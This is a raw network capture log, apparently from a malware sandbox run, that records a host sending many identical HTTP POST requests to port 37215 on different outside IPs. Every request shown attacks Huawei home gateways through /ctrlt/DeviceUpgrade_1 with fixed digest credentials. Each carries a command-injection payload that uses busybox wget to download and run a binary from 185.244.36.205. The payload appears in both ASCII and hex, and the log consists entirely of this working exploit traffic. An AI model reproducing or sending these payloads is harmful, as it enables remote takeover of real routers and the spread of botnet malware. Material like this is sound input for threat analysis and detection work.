                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1909192.168.2.1548514122.86.241.537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.952075005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1910192.168.2.1543828102.136.107.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.075134993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1911192.168.2.1545212222.29.120.4537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.075546980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1912192.168.2.155348245.129.203.22337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.075695038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1913192.168.2.1556064121.255.185.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.075747013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1914192.168.2.154422041.217.191.8637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.076286077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1915192.168.2.1547564181.106.123.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.076292038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1916192.168.2.1550420157.36.6.2337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.076335907 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1917192.168.2.1537554220.217.141.8737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.076420069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1918192.168.2.154719031.86.42.20837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.076653004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1919192.168.2.153543431.77.129.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.077223063 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
